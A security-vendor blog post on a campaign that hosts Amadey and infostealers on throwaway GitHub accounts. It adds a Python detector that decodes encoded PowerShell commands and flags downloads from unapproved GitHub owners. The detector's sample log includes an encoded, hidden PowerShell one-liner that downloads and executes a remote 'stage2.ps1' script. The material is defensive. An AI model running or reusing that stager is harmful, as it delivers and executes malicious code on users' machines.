
GitHub Exploited: New Malware-as-a-Service Operation Spreads Amadey and Data Stealers

Updated: Jul 21

A new Malware-as-a-Service (MaaS) operation is abusing GitHub repositories to distribute malicious payloads, including Amadey malware and various data stealers. No GitHub vulnerability is involved: the attackers simply create throwaway accounts and host files in them. Because the downloads come from GitHub's trusted domain, they pass the URL and domain-reputation filters that would block the same files served from an unknown host, which makes the tactic a significant concern for security teams and users alike.


GitHub Becomes a Malware Distribution Hub

Cybercriminals are increasingly abusing legitimate platforms like GitHub to host and distribute malware. This MaaS operation uses fake GitHub accounts to store malicious scripts, tools, and Amadey plugins. By disguising these payloads as benign software or updates within seemingly legitimate repositories, attackers circumvent network controls that allow GitHub traffic by default and would otherwise block downloads from unfamiliar domains.

The Mechanics of Deception

The operation employs a multi-stage infection process, often beginning with the Emmenhtal loader (also known as PEAKLIGHT). This loader, built with multiple layers of obfuscation, delivers Amadey, which in turn downloads additional payloads from the attacker-controlled GitHub repositories. These secondary payloads include well-known information stealers such as Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, as well as remote access trojans like AsyncRAT.

Key Takeaways

  • Threat actors are using fake GitHub accounts (e.g., Legendary99999, DFfe9ewf, Milidmdds) to host malware.

  • The Emmenhtal loader is a primary vector, delivering Amadey and other infostealers.

  • Malware is often disguised as legitimate software or updates within GitHub repositories.

  • The use of GitHub's trusted domain helps bypass web filtering and security controls.

  • The MaaS model democratizes cybercrime, enabling less skilled actors to launch sophisticated attacks.

Evolving Threats and Defense Strategies

This MaaS operation highlights a growing trend where cybercriminals repurpose legitimate services for malicious ends. The ability to host malware on a widely trusted platform like GitHub poses a significant challenge for controls that rely on domain reputation. The attack chains typically involve Base64-encoded scripts that are launched through trusted, signed Windows binaries such as PowerShell, so a check that looks only at the process name or the file signature sees nothing but legitimate tooling; the malicious content is visible only after the command line is decoded.

To counter these evolving threats, cybersecurity experts recommend several defense strategies:

  • Enhanced Scrutiny: Users and organizations should scrutinize repository metadata, including account age, commit history, and contributor profiles, before downloading any files. A freshly created account with a single commit that only adds binaries or encoded scripts is a warning sign.

  • Stricter Network Policies: Because GitHub as a whole can rarely be blocked, allowlist the specific GitHub organizations and repositories that are approved download sources, and use behavioral analysis to detect anomalous executions after a download.

  • Continuous Monitoring: Log process creation and script activity (for example, PowerShell script block logging) so that encoded commands and the URLs they fetch from are visible to real-time monitoring, and prioritize behavioral detections over static file checks.

  • User Education: Educate users about the risks of downloading files from unverified sources, even on seemingly legitimate platforms.
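The detection logic the network-policy and monitoring recommendations above call for, written here as an added Python example; it is not code from this article or from any of the cited reports. It takes process-creation events, decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text, which is what PowerShell expects), pulls GitHub download URLs out of both the raw and the decoded command line, and scores each event by whether the repository owner is on an allowlist. The `pid|image|cmdline` log format, the approved owners `acme-corp` and `acme-tooling`, and the owner `throwaway-acct-1` are constructed assumptions, not real telemetry or real accounts.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: an organization-specific allowlist of GitHub owners (users or
# orgs) whose repositories are approved download sources. Names are hypothetical.
APPROVED_GITHUB_OWNERS = {"acme-corp", "acme-tooling"}

# Hosts that serve GitHub repository, raw-file and release content.
GITHUB_HOSTS = (
    r"(?:raw\.githubusercontent\.com|github\.com|"
    r"objects\.githubusercontent\.com|codeload\.github\.com)"
)
# Capture group 1 is the repository owner, group 2 the repository name.
GITHUB_URL_RE = re.compile(
    r"https?://" + GITHUB_HOSTS + r"/([A-Za-z0-9_.-]+)/([A-Za-z0-9_.-]+)[^\s'\"<>)]*",
    re.IGNORECASE,
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand; loaders
# commonly use -e, -ec, -en, -enc or the full flag.
ENCODED_FLAG_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})"
)

# Signed Windows script hosts that encoded stagers are typically launched through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe"}


@dataclass
class Finding:
    pid: int
    image: str
    encoded: bool
    decoded_command: Optional[str]
    github_owners: List[str] = field(default_factory=list)
    unapproved_owners: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        """Crude severity: an encoded launch fetching from an unapproved
        GitHub owner is the pattern the article describes."""
        s = 0
        if self.encoded:
            s += 1
        if self.github_owners:
            s += 1
        if self.unapproved_owners:
            s += 2
        return s


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a PowerShell -EncodedCommand value (Base64 of UTF-16LE)."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def github_owners_in(text: str) -> List[str]:
    """Repository owners of every GitHub download URL found in text."""
    return [m.group(1).lower() for m in GITHUB_URL_RE.finditer(text)]


def analyze_process_event(pid: int, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding for script-host launches worth a second look, else None."""
    name = image.rsplit("\\", 1)[-1].lower()
    if name not in SCRIPT_HOSTS:
        return None
    decoded = decode_encoded_command(cmdline)
    # Look for URLs in the visible command line and in the decoded payload.
    surface = cmdline + ("\n" + decoded if decoded else "")
    owners = github_owners_in(surface)
    unapproved = sorted({o for o in owners if o not in APPROVED_GITHUB_OWNERS})
    finding = Finding(pid, name, decoded is not None, decoded, owners, unapproved)
    return finding if finding.score > 0 else None


def analyze_log(lines: List[str]) -> List[Finding]:
    """Parse constructed 'pid|image|cmdline' lines and return scored findings."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        pid_s, image, cmdline = line.split("|", 2)
        f = analyze_process_event(int(pid_s), image, cmdline)
        if f:
            findings.append(f)
    return sorted(findings, key=lambda f: -f.score)


def _ps_encode(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry); owner names are hypothetical.
SAMPLE_LOG = [
    "1001|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -NoProfile -Command Get-Process",
    "1002|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell.exe -w hidden -ep bypass -enc "
    + _ps_encode("IEX (New-Object Net.WebClient).DownloadString("
                 "'https://raw.githubusercontent.com/throwaway-acct-1/updater/main/stage2.ps1')"),
    "1003|C:\\Program Files\\PowerShell\\7\\pwsh.exe|"
    "pwsh.exe -Command \"Invoke-WebRequest https://github.com/acme-corp/tooling/"
    "releases/download/v1.2/tool.zip -OutFile tool.zip\"",
    "1004|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\a\\notes.txt",
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"pid={f.pid} image={f.image} score={f.score} encoded={f.encoded} "
              f"owners={f.github_owners} unapproved={f.unapproved_owners}")
```

Run stand-alone, the script flags event 1002 (encoded launch pulling from an owner outside the allowlist) ahead of event 1003 (plain download from an approved owner) and ignores the benign PowerShell and Notepad events. The decoding step is the important part: the raw command line of 1002 contains no URL at all, so a rule that only pattern-matches command lines would miss it.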

GitHub has been taking down reported malicious accounts, but new ones are cheap to create, so these campaigns persist. That persistence underscores the need for ongoing vigilance and for collaboration between platforms, security firms, and users.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • New Malware-as-a-Service Operation Abuses GitHub Repositories to Deploy Infostealers Like Lumma and Amadey, WebProNews.

  • Hackers Use GitHub Repositories to Host Amadey Malware and Data Stealers, Bypassing Filters, The Hacker News.

  • MaaS Operation Uses GitHub to Host Loaders and Malware, TechNadu.

  • Threat Actors Exploit GitHub Accounts to Host Payloads, Tools, and Amadey Malware Plugins, GBHackers News.

  • Threat Actors Weaponizing GitHub Accounts To Host Payloads, Tools and Amadey Malware Plug-Ins, CyberSecurityNews.
